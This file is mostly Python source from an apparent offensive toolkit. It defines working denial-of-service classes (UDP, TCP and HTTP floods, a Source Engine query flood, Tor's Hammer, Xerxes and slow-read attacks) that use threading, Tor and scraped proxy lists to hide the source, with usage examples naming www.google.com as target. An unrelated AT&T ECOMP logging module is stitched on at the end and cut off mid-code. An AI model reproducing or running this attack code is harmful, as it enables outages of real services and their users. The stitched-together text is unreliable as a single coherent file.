the following classes are for DoS attacks simulations with different tools that have been either originally written in
diffferent languages (Perl: slowloris and C: xerxes and slow_read attack...) and rewritten in python and other python tools that are PoC for
some vulnerabilities (slow post attacks, hulk) with some modifications that has improved their performance!!!
'''
class udp_flood:
def __init__(self,u,p=80,threads_daemon=True,interval=0.001,min_size=10,max_size=10,connection=True,duration=60,threads=1,limiting=True,logs=False):
self.target=u
self.port=p
self.interval=interval
self.min_size=min_size
self.max_size=max_size
self.connection=connection
self.duration=duration
self.limiting=limiting
self.logs=logs
self.stop=False
self.counter=0
self.start=time.time()
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
tm=time.time()
size=0
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
if self.connection==True:
s.connect((self.target,self.port))
msg=''
for x in range(random.randint(self.min_size,self.max_size)):
msg+=random.choice(lis)
if len(msg)>1400:
msg=msg[0:1400]#make sure all payloads' sizes are on the right range
s.sendto((msg.encode('utf-8')),(self.target,self.port))
size+=len(msg)
self.counter+=1
if((self.logs==True) and (int(time.time()-tm)==1)):
sys.stdout.write("\rPackets: {} | Bytes/s: {} ".format(self.counter,size))
sys.stdout.flush()
tm=time.time()
size=0
if self.limiting==True:
time.sleep(self.interval)
except:
try:
time.sleep(self.interval)
except:
pass
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()#this will kill any running threads instantly by setting all the attacking information to "None" and cause error which is handled with the "try...except..." around the main while loop
return a
class vse_flood:
def __init__(self,u,p=80,threads_daemon=True,interval=0.001,connection=True,duration=60,threads=1,limiting=True,logs=False):
self.target=u
self.port=p
self.payload=b'\xff\xff\xff\xffTSource Engine Query\x00' # read more at https://developer.valvesoftware.com/wiki/Server_queries
self.interval=interval
self.connection=connection
self.duration=duration
self.limiting=limiting
self.logs=logs
self.stop=False
self.counter=0
self.start=time.time()
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
tm=time.time()
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
if self.connection==True:
s.connect((self.target,self.port))
s.sendto(self.payload,(self.target,self.port))
self.counter+=1
if((self.logs==True) and (int(time.time()-tm)==1)):
sys.stdout.write("\rPackets: {} ".format(self.counter))
sys.stdout.flush()
tm=time.time()
if self.limiting==True:
time.sleep(self.interval)
except:
pass
try:
time.sleep(self.interval)
except:
pass
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class tcp_flood:
def __init__(self,u,p=80,threads_daemon=True,min_size=10,max_size=50,threads=256,timeout=5,round_min=50,round_max=150,interval=0.001,duration=60,logs=False,tor=False):
self.logs=logs
self.stop=False
self.counter=0
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.tor=tor
self.min_size=min_size
self.max_size=max_size
self.interval=interval
self.round_min=round_min
self.round_max=round_max
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)#give time for all threads to be created
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor==False:
s.settimeout=(self.timeout)#we can't set timeout with socks module if we are going to use a socks proxy
if self.tor==True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)#let the traffic go through tor
s.connect((self.target,self.port))#connect to target
if (self.port==443) or (self.port==8443):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)#use ssl if needed on specific ports
for l in range(random.randint(self.round_min,self.round_max)):#send packets with random number of times for each connection (number between "round_min" and "round_max")
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if stop==True:
break
m=''
for li in range(random.randint(self.min_size,self.max_size)): #each payload' size is chosen randomly between maximum and minimum values
m+=random.choice(lis)
try:
if stop==True:
break
s.send(m.encode('utf-8'))
self.counter+=1
if self.logs==True:
sys.stdout.write("\rPackets: {} | Bytes: {} ".format(self.counter,len(m)))
sys.stdout.flush()
#print("Packets: {} | Bytes: {}".format(tcp_counter,len(m)))
except:
break
time.sleep(self.interval)
s.close()
except:
pass
time.sleep(.1)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
'''
usage:
>>>bane.tcp_flood('www.google.com')
>>>bane.tcp_flood('www.google.com',p=80, threads=150, timeout=5)
p: (set by default to: 80) targeted port
threads: (set by default to: 256) threads to use
timeout: (set by default to: 5) timeout flag
'''
class http_spam:
def __init__(self,u,p=80,cookie=None,user_agents=None,method=3,threads_daemon=True,paths=["/"],threads=256,post_min=5,post_max=10,post_field_max=100,post_field_min=50,timeout=5,round_min=50,round_max=150,interval=0.001,duration=60,logs=False,tor=False):
self.logs=logs
self.cookie=cookie
self.user_agents=user_agents
if not self.user_agents or len(self.user_agents)==0:
self.user_agents=ua
self.method=method
self.stop=False
self.counter=0
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.tor=tor
self.interval=interval
self.round_min=round_min
self.round_max=round_max
self.paths=paths
self.post_min=post_min
self.post_max=post_max
self.post_field_max=post_field_max
self.post_field_min=post_field_min
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor==False:
s.settimeout=(self.timeout)
if self.tor==True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
s.connect((self.target,self.port))
if ((self.port==443) or (self.port==8443)):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
for l in range(random.randint(self.round_min,self.round_max)):
if self.method==3:
ty=random.randint(1,2)
else:
ty=self.method
if ty==1:
req="GET"
else:
req="POST"
m=setup_http_packet(self.target,ty,self.paths,self.post_field_min,self.post_field_max,self.post_min,self.post_max,self.cookie,self.user_agents)
try:
if self.stop==True:
break
s.send(m.encode('utf-8'))
self.counter+=1
if self.logs==True:
sys.stdout.write("\rRequest: {} | Type: {} | Bytes: {} ".format(self.counter,req,len(m)))
sys.stdout.flush()
#print("Request: {} | Type: {} | Bytes: {}".format(http_counter,req,len(m)))
except:
break
time.sleep(self.interval)
s.close()
except:
pass
time.sleep(.1)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class prox_http_spam:
def __init__(self,u,p=80,cookie=None,user_agents=None,method=3,threads_daemon=True,scraping_timeout=15,http_list=None,socks4_list=None,socks5_list=None,paths=["/"],threads=256,post_min=5,post_max=10,post_field_max=100,post_field_min=50,timeout=5,round_min=50,round_max=150,interval=0.001,duration=60,logs=False):
self.logs=logs
self.cookie=cookie
self.user_agents=user_agents
if not self.user_agents or len(self.user_agents)==0:
self.user_agents=ua
self.method=method
self.stop=False
self.counter=0
self.httplist=http_list
if not self.httplist and self.httplist!=[]:
self.httplist=masshttp(timeout=scraping_timeout)
self.socks4list=socks4_list
if not self.socks4list and self.socks4list!=[] :
self.socks4list=massocks4(timeout=scraping_timeout)
self.socks5list=socks5_list
if not self.socks5list and self.socks5list!=[]:
self.socks5list=massocks5(timeout=scraping_timeout)
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.tor=tor
self.interval=interval
self.round_min=round_min
self.round_max=round_max
self.paths=paths
self.post_min=post_min
self.post_max=post_max
self.post_field_max=post_field_max
self.post_field_min=post_field_min
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
bot_type=[]
if len(self.httplist)>0:
bot_type.append("h")
if len(self.socks4list)>0:
bot_type.append("s4")
if len(self.socks5list)>0:
bot_type.append("s5")
z=random.choice(bot_type)
if z=="h":
line=random.choice(self.httplist)
elif z=="s4":
line=random.choice(self.socks4list)
elif z=="s5":
line=random.choice(self.socks5list)
ipp=line.split(":")[0].split("=")[0]
pp=line.split(":")[1].split("=")[0]
s =socks.socksocket()
if z=="h":
s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
elif z=="s4":
s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
elif z=="s5":
s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
if z=="h":
s.settimeout(self.timeout)
s.connect((self.target,self.port))
if ((self.port==443) or (self.port==8443)):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
for l in range(random.randint(self.round_min,self.round_max)):
if self.method==3:
ty=random.randint(1,2)
else:
ty=self.method
if ty==1:
req="GET"
else:
req="POST"
m=setup_http_packet(self.target,ty,self.paths,self.post_field_min,self.post_field_max,self.post_min,self.post_max,self.cookie,self.user_agents)
try:
if stop==True:
break
s.send(m.encode('utf-8'))
self.counter+=1
if self.logs==True:
sys.stdout.write("\rBot: {} | Request: {} | Type: {} | Bytes: {} ".format(ipp,self.counter,req,len(m)))
sys.stdout.flush()
#print("Bot: {} | Request: {} | Type: {} | Bytes: {}".format(ipp,lulzer_counter,req,len(m)))
except:
break
time.sleep(self.interval)
s.close()
except:
pass
time.sleep(.1)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class torshammer:
def __init__(self,u,p=80,cookie=None,user_agents=None,threads_daemon=True,threads=500,timeout=5,tor=False,duration=60,logs=False,max_content=15000,min_content=10000):
self.counter=0
self.cookie=cookie
self.user_agents=user_agents
if not self.user_agents or len(self.user_agents)==0:
self.user_agents=ua
self.max_content=max_content
self.min_content=min_content
self.stop=False
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.tor=tor
self.logs=logs
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor==False:
s.settimeout(self.timeout)
if self.tor==True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
s.connect((self.target,self.port))
if ((self.port==443) or (self.port==8443)):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
self.counter+=1
if self.logs==True:
sys.stdout.write("\rConnected to {}:{}...".format(self.target,self.port))
sys.stdout.flush()
#print("Connected to {}:{}...".format(self.target,self.port))
q=random.randint(self.min_content,self.max_content)
ck=""
if self.cookie:
ck="Cookie: "+self.cookie+"\r\n"
s.send(reorder_headers_randomly("POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(random.choice(paths),ck,random.choice(self.user_agents),random.randint(300,1000),q,(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),self.target)).encode('utf-8'))
for i in range(q):
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
h=random.choice(lis)
try:
s.send(h.encode('utf-8'))
if self.logs==True:
sys.stdout.write("\rPosted: {}".format(h))
sys.stdout.flush()
#print("Posted: {}".format(h))
time.sleep(random.uniform(.1,3))
except:
break
s.close()
except:
pass
self.counter-=1
time.sleep(.1)
if self.stop==True:
break
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class prox_hammer:
def __init__(self,u,p=80,cookie=None,user_agents=None,threads_daemon=True,scraping_timeout=15,max_content=15000,min_content=10000,threads=700,timeout=5,http_list=None,socks4_list=None,socks5_list=None,duration=60,logs=True):
self.cookie=cookie
self.user_agents=user_agents
if not self.user_agents or len(self.user_agents)==0:
self.user_agents=ua
self.httplist=http_list
if not self.httplist and self.httplist!=[]:
self.httplist=masshttp(timeout=scraping_timeout)
self.socks4list=socks4_list
if not self.socks4list and self.socks4list!=[] :
self.socks4list=massocks4(timeout=scraping_timeout)
self.socks5list=socks5_list
if not self.socks5list and self.socks5list!=[]:
self.socks5list=massocks5(timeout=scraping_timeout)
self.stop=False
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.max_content=max_content
self.min_content=min_content
self.logs=logs
self.counter=0
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
bot_type=[]
if len(self.httplist)>0:
bot_type.append("h")
if len(self.socks4list)>0:
bot_type.append("s4")
if len(self.socks5list)>0:
bot_type.append("s5")
z=random.choice(bot_type)
if z=="h":
line=random.choice(self.httplist)
elif z=="s4":
line=random.choice(self.socks4list)
elif z=="s5":
line=random.choice(self.socks5list)
ipp=line.split(":")[0].split("=")[0]
pp=line.split(":")[1].split("=")[0]
s =socks.socksocket()
if z=="h":
s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
elif z=="s4":
s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
elif z=="s5":
s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
if z=="h":
s.settimeout(self.timeout)
s.connect((self.target,self.port))
self.counter+=1
if ((self.port==443)or(self.port==8443)):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
q=random.randint(self.min_content,self.max_content)
ck=""
if self.cookie:
ck="Cookie: "+cookie+"\r\n"
s.send(reorder_headers_randomly("POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(random.choice(paths),ck,random.choice(self.user_agents),random.randint(300,1000),q,(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),self.target)).encode('utf-8'))
for i in range(q):
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
h=random.choice(lis)
try:
s.send(h.encode('utf-8'))
if self.logs==True:
sys.stdout.write("\rPosted: {} --> {}".format(h,ipp))
sys.stdout.flush()
#print("Posted: {} --> {}".format(h,ipp))
time.sleep(random.uniform(.1,3))
except:
break
s.close()
except:
pass
self.counter-=1
time.sleep(.1)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class xerxes:
def __init__(self,u,p=80,threads_daemon=True,threads=500,timeout=5,duration=60,logs=False,tor=False):
self.counter=0
self.target=u
self.port=p
self.stop=False
self.duration=duration
self.timeout=timeout
self.tor=tor
self.start=time.time()
self.logs=logs
self.id_key=0
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
self.id_key+=1
def attack(self):
try:
x=self.id_key
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor==False:
s.settimeout(self.timeout)
if self.tor==True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
s.connect((self.target,self.port))
self.counter+=1
"""if self.logs==True:
#print("[Connected to {}:{}]".format(self.target,self.port))
sys.stdout.write("\r[Connected to {}:{}]".format(self.target,self.port))
sys.stdout.flush()"""
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s.send("\x00".encode('utf-8'))#send NULL character
if self.logs==True:
sys.stdout.write("\r[{}: Voly sent] ".format(x))
sys.stdout.flush()
except:
break
time.sleep(.2)
except:
pass
self.counter-=1
time.sleep(.3)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class prox_xerxes:
def __init__(self,u,scraping_timeout=15,p=80,threads_daemon=True,threads=700,timeout=5,http_list=None,socks4_list=None,socks5_list=None,duration=60,logs=False):
self.httplist=http_list
if not self.httplist and self.httplist!=[]:
self.httplist=masshttp(timeout=scraping_timeout)
self.socks4list=socks4_list
if not self.socks4list and self.socks4list!=[] :
self.socks4list=massocks4(timeout=scraping_timeout)
self.socks5list=socks5_list
if not self.socks5list and self.socks5list!=[]:
self.socks5list=massocks5(timeout=scraping_timeout)
self.stop=False
self.counter=0
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.logs=logs
self.id_key=0
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
self.id_key+=1
def attack(self):
try:
x=self.id_key
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
bot_type=[]
if len(self.httplist)>0:
bot_type.append("h")
if len(self.socks4list)>0:
bot_type.append("s4")
if len(self.socks5list)>0:
bot_type.append("s5")
z=random.choice(bot_type)
if z=="h":
line=random.choice(self.httplist)
elif z=="s4":
line=random.choice(self.socks4list)
elif z=="s5":
line=random.choice(self.socks5list)
ipp=line.split(":")[0].split("=")[0]
pp=line.split(":")[1].split("=")[0]
s =socks.socksocket()
if z=="h":
s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
elif z=="s4":
s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
elif z=="s5":
s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
if z=="h":
s.settimeout(self.timeout)
s.connect((self.target,self.port))
self.counter+=1
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s.send("\x00".encode('utf-8'))#send NULL character
if self.logs==True:
sys.stdout.write("\r[{}: Voly sent-->{}] ".format(x,ipp))
sys.stdout.flush()
except:
break
time.sleep(.2)
except:
pass
self.counter-=1
time.sleep(.3)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
'''
this tool is to perform slow reading attack. i read about this type of attacks on: https://blog.qualys.com/tag/slow-http-attack and tried to do the same thing in python (but in a better way though :p ). on this attack, the attacker is sending a full legitimate HTTP request but reading it slowly to keep the connection open as long as possible. here im doing it a bit different of the original attack with slowhttptest, im sending a normal HTTP request on each thread then read a small part of it (between 1 to 3 bytes randomly sized) then it sleeps for few seconds (3 to 5 seconds randomly sized too), then it sends another request and keep doing the same and keeping the connection open forever.
it takes the following parameters:
u: target ip or domain
p: (set by default to: 80)
threads: (set by default to: 500) number of connections
timeout: (set by default to: 5) connection timeout flag
example:
>>>import bane
>>>bane.slow_read_attack('www.google.com',p=443,threads=300,timeout=7)
'''
class slow_read:
def __init__(self,u,p=80,cookie=None,user_agents=None,paths=["/"],threads_daemon=True,threads=500,timeout=5,min_speed=3,max_speed=5,max_read=3,min_read=1,logs=False,tor=False,duration=60):
self.counter=0
self.cookie=cookie
self.user_agents=user_agents
if not self.user_agents or len(self.user_agents)==0:
self.user_agents=ua
self.stop=False
self.target=u
self.port=p
self.paths=paths
self.timeout=timeout
self.tor=tor
self.read_max=max_read
self.read_min=min_read
self.min_speed=min_speed
self.max_speed=max_speed
self.logs=logs
self.duration=duration
self.start=time.time()
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor==False:
s.settimeout(self.timeout)
if self.tor==True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
s.connect((self.target,self.port))
if ((self.port==443)or(self.port==8443)):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s.send(setup_http_packet(self.target,3,self.paths,2,8,10,50,self.cookie,self.user_agents).encode('utf-8'))
self.counter+=1
while True:
d=s.recv(random.randint(self.read_min,self.read_max))
if self.logs==True:
sys.stdout.write("\rReceived: {} ".format(str(d.decode('utf-8').strip())))
sys.stdout.flush()
#print("Received: {}".format(str(d.decode('utf-8'))))
time.sleep(random.randint(self.min_speed,self.max_speed))
except:
break
s.close()
except:
pass
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
"""
The rest of the DDoS tools have been removed and will be added slowly in the coming versions :) Be patient !!
"""
|
CommonLogger.py
|
#!/usr/bin/python
# -*- indent-tabs-mode: nil -*- vi: set expandtab:
"""ECOMP Common Logging library in Python.
CommonLogger.py
# Copyright (C) 2017 AT&T Intellectual Property. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this code except in compliance
# with the License. You may obtain a copy of the License
# at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
Original Written by: Terry Schmalzried
Date written: October 1, 2015
Last updated: December 1, 2016
version 0.8
"""
from __future__ import print_function
import os, sys, getopt, logging, logging.handlers, time, re, uuid, socket, threading
class CommonLogger:
"""ECOMP Common Logging object.
Public methods:
__init__
setFields
debug
info
warn
error
fatal
"""
UnknownFile = -1
ErrorFile = 0
DebugFile = 1
AuditFile = 2
MetricsFile = 3
DateFmt = '%Y-%m-%dT%H:%M:%S'
def __init__(self, configFile, logKey, **kwargs):
"""Construct a Common Logger for one Log File.
Arguments:
configFile -- configuration filename.
logKey -- the keyword in configFile that identifies the log filename.
Keyword arguments: Annotations are d:debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages,
one of CommonLogger.ErrorFile, CommonLogger.DebugFile,
CommonLogger.AuditFile and CommonLogger.MetricsFile, or
one of the strings "error", "debug", "audit" or "metrics".
May also be set in the config file using a field named
<logKey>Style (where <logKey> is the value of the logKey
parameter). The keyword value overrides the value in the
config file.
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._monitorFlag = False
# Get configuration parameters
self._logKey = str(logKey)
self._configFile = str(configFile)
self._rotateMethod = 'time'
self._timeRotateIntervalType = 'midnight'
self._timeRotateInterval = 1
self._sizeMaxBytes = 0
self._sizeRotateMode = 'a'
self._socketHost = None
self._socketPort = 0
self._typeLogger = 'filelogger'
self._backupCount = 6
self._logLevelThreshold = self._intLogLevel('')
self._logFile = None
self._begTime = None
self._begMsec = 0
self._fields = {}
self._fields["style"] = CommonLogger.UnknownFile
try:
self._configFileModified = os.path.getmtime(self._configFile)
for line in open(self._configFile):
line = line.split('#',1)[0] # remove comments
if '=' in line:
key, value = [x.strip() for x in line.split('=',1)]
if key == 'rotateMethod' and value.lower() in ['time', 'size', 'none']:
self._rotateMethod = value.lower()
elif key == 'timeRotateIntervalType' and value in ['S', 'M', 'H', 'D', 'W0', 'W1', 'W2', 'W3', 'W4', 'W5', 'W6', 'midnight']:
self._timeRotateIntervalType = value
elif key == 'timeRotateInterval' and int( value ) > 0:
self._timeRotateInterval = int( value )
elif key == 'sizeMaxBytes' and int( value ) >= 0:
self._sizeMaxBytes = int( value )
elif key == 'sizeRotateMode' and value in ['a']:
self._sizeRotateMode = value
elif key == 'backupCount' and int( value ) >= 0:
self._backupCount = int( value )
elif key == self._logKey + 'SocketHost':
self._socketHost = value
elif key == self._logKey + 'SocketPort' and int( value ) == 0:
self._socketPort = int( value )
elif key == self._logKey + 'LogType' and value.lower() in ['filelogger', 'stdoutlogger', 'stderrlogger', 'socketlogger', 'nulllogger']:
self._typeLogger = value.lower()
elif key == self._logKey + 'LogLevel':
self._logLevelThreshold = self._intLogLevel(value.upper())
elif key == self._logKey + 'Style':
self._fields["style"] = value
elif key == self._logKey:
self._logFile = value
except Exception as x:
print("exception reading '%s' configuration file: %s" %(self._configFile, str(x)), file=sys.stderr)
sys.exit(2)
except:
print("exception reading '%s' configuration file" %(self._configFile), file=sys.stderr)
sys.exit(2)
if self._logFile is None:
print('configuration file %s is missing definition %s for log file' %(self._configFile, self._logKey), file=sys.stderr)
sys.exit(2)
# initialize default log fields
# timestamp will automatically be generated
for key in ['style', 'requestID', 'serviceInstanceID', 'threadID', 'serverName', 'serviceName', 'instanceUUID', \
'severity', 'serverIPAddress', 'server', 'IPAddress', 'className', 'timer', \
'partnerName', 'targetEntity', 'targetServiceName', 'statusCode', 'responseCode', \
'responseDescription', 'processKey', 'targetVirtualEntity', 'customField1', \
'customField2', 'customField3', 'customField4', 'errorCategory', 'errorCode', \
'errorDescription' ]:
if key in kwargs and kwargs[key] != None:
self._fields[key] = kwargs[key]
self._resetStyleField()
# Set up logger
self._logLock = threading.Lock()
with self._logLock:
self._logger = logging.getLogger(self._logKey)
self._logger.propagate = False
self._createLogger()
self._defaultServerInfo()
# spawn a thread to monitor configFile for logLevel and logFile changes
self._monitorFlag = True
self._monitorThread = threading.Thread(target=self._monitorConfigFile, args=())
self._monitorThread.daemon = True
self._monitorThread.start()
def _createLogger(self):
if self._typeLogger == 'filelogger':
self._mkdir_p(self._logFile)
if self._rotateMethod == 'time':
self._logHandler = logging.handlers.TimedRotatingFileHandler(self._logFile, \
when=self._timeRotateIntervalType, interval=self._timeRotateInterval, \
backupCount=self._backupCount, encoding=None, delay=False, utc=True)
elif self._rotateMethod == 'size':
self._logHandler = logging.handlers.RotatingFileHandler(self._logFile, \
mode=self._sizeRotateMode, maxBytes=self._sizeMaxBytes, \
backupCount=self._backupCount, encoding=None, delay=False)
else:
self._logHandler = logging.handlers.WatchedFileHandler(self._logFile, \
